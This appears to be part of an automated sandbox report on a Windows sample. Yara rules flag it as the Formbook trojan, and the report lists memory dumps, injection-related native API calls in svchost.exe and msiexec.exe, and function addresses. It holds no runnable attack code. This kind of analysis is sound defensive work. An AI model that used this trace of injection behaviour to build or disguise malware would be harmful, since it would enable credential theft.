            Source: Yara matchFile source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C3A3 NtClose,1_2_0042C3A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472A80 NtClose,LdrInitializeThunk,1_2_03472A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D10 NtQuerySystemInformation,LdrInitializeThunk,1_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034734E0 NtCreateMutant,LdrInitializeThunk,1_2_034734E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474260 NtSetContextThread,1_2_03474260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474570 NtSuspendThread,1_2_03474570
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B00 NtQueryValueKey,1_2_03472B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B10 NtAllocateVirtualMemory,1_2_03472B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B20 NtQueryInformationProcess,1_2_03472B20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BC0 NtQueryInformationToken,1_2_03472BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BE0 NtQueryVirtualMemory,1_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B80 NtCreateKey,1_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B90 NtFreeVirtualMemory,1_2_03472B90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472A10 NtWriteFile,1_2_03472A10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AC0 NtEnumerateValueKey,1_2_03472AC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AA0 NtQueryInformationFile,1_2_03472AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034729D0 NtWaitForSingleObject,1_2_034729D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034729F0 NtReadFile,1_2_034729F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F00 NtCreateFile,1_2_03472F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F30 NtOpenDirectoryObject,1_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FB0 NtSetValueKey,1_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E50 NtCreateSection,1_2_03472E50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E00 NtQueueApcThread,1_2_03472E00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EC0 NtQuerySection,1_2_03472EC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472ED0 NtResumeThread,1_2_03472ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E80 NtCreateProcessEx,1_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EB0 NtProtectVirtualMemory,1_2_03472EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D50 NtWriteVirtualMemory,1_2_03472D50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DC0 NtAdjustPrivilegesToken,1_2_03472DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DA0 NtReadVirtualMemory,1_2_03472DA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C50 NtUnmapViewOfSection,1_2_03472C50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C10 NtOpenProcess,1_2_03472C10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C20 NtSetInformationFile,1_2_03472C20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C30 NtMapViewOfSection,1_2_03472C30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CD0 NtEnumerateKey,1_2_03472CD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CF0 NtDelayExecution,1_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034738D0 NtGetContextThread,1_2_034738D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473C30 NtOpenProcessToken,1_2_03473C30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473C90 NtOpenThread,1_2_03473C90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E4570 NtSuspendThread,LdrInitializeThunk,3_2_051E4570
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E4260 NtSetContextThread,LdrInitializeThunk,3_2_051E4260
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_051E2D10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2C30 NtMapViewOfSection,LdrInitializeThunk,3_2_051E2C30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2C50 NtUnmapViewOfSection,LdrInitializeThunk,3_2_051E2C50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2CF0 NtDelayExecution,LdrInitializeThunk,3_2_051E2CF0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2F00 NtCreateFile,LdrInitializeThunk,3_2_051E2F00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2E00 NtQueueApcThread,LdrInitializeThunk,3_2_051E2E00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2E50 NtCreateSection,LdrInitializeThunk,3_2_051E2E50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2ED0 NtResumeThread,LdrInitializeThunk,3_2_051E2ED0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E29F0 NtReadFile,LdrInitializeThunk,3_2_051E29F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_051E2B90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2B80 NtCreateKey,LdrInitializeThunk,3_2_051E2B80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_051E2BC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2A10 NtWriteFile,LdrInitializeThunk,3_2_051E2A10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2A80 NtClose,LdrInitializeThunk,3_2_051E2A80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E34E0 NtCreateMutant,LdrInitializeThunk,3_2_051E34E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E38D0 NtGetContextThread,LdrInitializeThunk,3_2_051E38D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2D50 NtWriteVirtualMemory,3_2_051E2D50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2DA0 NtReadVirtualMemory,3_2_051E2DA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2DC0 NtAdjustPrivilegesToken,3_2_051E2DC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2C10 NtOpenProcess,3_2_051E2C10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2C20 NtSetInformationFile,3_2_051E2C20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2CD0 NtEnumerateKey,3_2_051E2CD0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2F30 NtOpenDirectoryObject,3_2_051E2F30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2FB0 NtSetValueKey,3_2_051E2FB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2E80 NtCreateProcessEx,3_2_051E2E80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2EB0 NtProtectVirtualMemory,3_2_051E2EB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2EC0 NtQuerySection,3_2_051E2EC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E29D0 NtWaitForSingleObject,3_2_051E29D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2B10 NtAllocateVirtualMemory,3_2_051E2B10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2B00 NtQueryValueKey,3_2_051E2B00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2B20 NtQueryInformationProcess,3_2_051E2B20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2BE0 NtQueryVirtualMemory,3_2_051E2BE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2AA0 NtQueryInformationFile,3_2_051E2AA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E2AC0 NtEnumerateValueKey,3_2_051E2AC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E3C30 NtOpenProcessToken,3_2_051E3C30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E3C90 NtOpenThread,3_2_051E3C90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CEEFE NtQueryInformationProcess,3_2_054CEEFE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00434D50: GetFullPathNameW,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004461ED DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00409A400_2_00409A40
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004120380_2_00412038
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004271610_2_00427161
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0047E1FA0_2_0047E1FA
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004212BE0_2_004212BE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004433900_2_00443390
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004433910_2_00443391
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0041A46B0_2_0041A46B
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0041240C0_2_0041240C
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004465660_2_00446566
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004045E00_2_004045E0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0041D7500_2_0041D750
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004037E00_2_004037E0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004278590_2_00427859
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004128180_2_00412818
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040F8900_2_0040F890
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0042397B0_2_0042397B
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00411B630_2_00411B63
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0047CBF00_2_0047CBF0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044EBBC0_2_0044EBBC
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00412C380_2_00412C38
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044ED9A0_2_0044ED9A
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00423EBF0_2_00423EBF
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00424F700_2_00424F70
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0041AF0D0_2_0041AF0D
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_045470000_2_04547000
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0454AAE80_2_0454AAE8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183F31_2_004183F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031001_2_00403100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E9D31_2_0042E9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402BD01_2_00402BD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC9A1_2_0040FC9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FCA31_2_0040FCA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004044A41_2_004044A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165D01_2_004165D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165D31_2_004165D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FEC31_2_0040FEC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF431_2_0040DF43
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004027701_2_00402770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3101_2_0344E310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034022451_2_03402245
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350010E1_2_0350010E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EE0761_2_034EE076
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034300A01_2_034300A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F67571_2_034F6757
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344A7601_2_0344A760
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034427601_2_03442760
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034646701_2_03464670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C6001_2_0345C600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA6C01_2_034FA6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C6E01_2_0343C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034406801_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350A5261_2_0350A526
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034404451_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440B101_2_03440B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4BC01_2_034B4BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEA5B1_2_034FEA5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FCA131_2_034FCA13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343E9A01_2_0343E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FE9A61_2_034FE9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034268681_2_03426868
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E8101_2_0346E810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E08351_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C01_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034568821_2_03456882
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DC89F1_2_034DC89F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344CF001_2_0344CF00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03446FE01_2_03446FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEFBF1_2_034FEFBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03482E481_2_03482E48
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460E501_2_03460E50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0E6D1_2_034E0E6D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432EE81_2_03432EE8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F0EAD1_2_034F0EAD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440D691_2_03440D69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AD001_2_0343AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452DB01_2_03452DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EEC4C1_2_034EEC4C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F6C691_2_034F6C69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEC601_2_034FEC60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430C121_2_03430C12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344AC201_2_0344AC20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BEC201_2_034BEC20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03458CDF1_2_03458CDF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350ACEB1_2_0350ACEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF3301_2_034FF330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034313801_2_03431380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F124C1_2_034F124C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342D2EC1_2_0342D2EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0348717A1_2_0348717A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342F1131_2_0342F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DD1301_2_034DD130
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034451C01_2_034451C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B1E01_2_0345B1E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344B0D01_2_0344B0D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F70F11_2_034F70F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347508C1_2_0347508C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ED6461_2_034ED646
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DD62C1_2_034DD62C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E16231_2_034E1623
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B36EC1_2_034B36EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF6F61_2_034FF6F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF5C91_2_034FF5C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F75C61_2_034F75C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AD4801_2_034AD480
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D54901_2_034D5490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347DB191_2_0347DB19
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFB2E1_2_034FFB2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D1B801_2_034D1B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFA891_2_034FFA89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FAA01_2_0345FAA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034859C01_2_034859C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034099E81_2_034099E8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034498701_2_03449870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B8701_2_0345B870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B58701_2_034B5870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF8721_2_034FF872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034438001_2_03443800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F18DA1_2_034F18DA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F78F31_2_034F78F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B98B21_2_034B98B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BFF401_2_034BFF40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFF631_2_034FFF63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F1FC61_2_034F1FC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F9ED21_2_034F9ED2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03441EB21_2_03441EB2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7D4C1_2_034F7D4C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFD271_2_034FFD27
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03449DD01_2_03449DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DFDF41_2_034DFDF4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03443C601_2_03443C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C7CE81_2_034C7CE8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FCE01_2_0345FCE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D9C981_2_034D9C98
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C28342_2_015C2834
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015E32C42_2_015E32C4
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C45942_2_015C4594
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015B8D952_2_015B8D95
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C458B2_2_015C458B
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015CCCE42_2_015CCCE4
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C47B42_2_015C47B4
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C96442_2_015C9644
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015CAEC42_2_015CAEC4
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015CAEC12_2_015CAEC1
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_0537FFD32_2_0537FFD3
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_0537FFD02_2_0537FFD0
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_053796A32_2_053796A3
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_0537969A2_2_0537969A
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_053779432_2_05377943
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_053798C32_2_053798C3
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_053983D32_2_053983D3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0527A5263_2_0527A526
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B04453_2_051B0445
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052667573_2_05266757
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051BA7603_2_051BA760
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B27603_2_051B2760
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051CC6003_2_051CC600
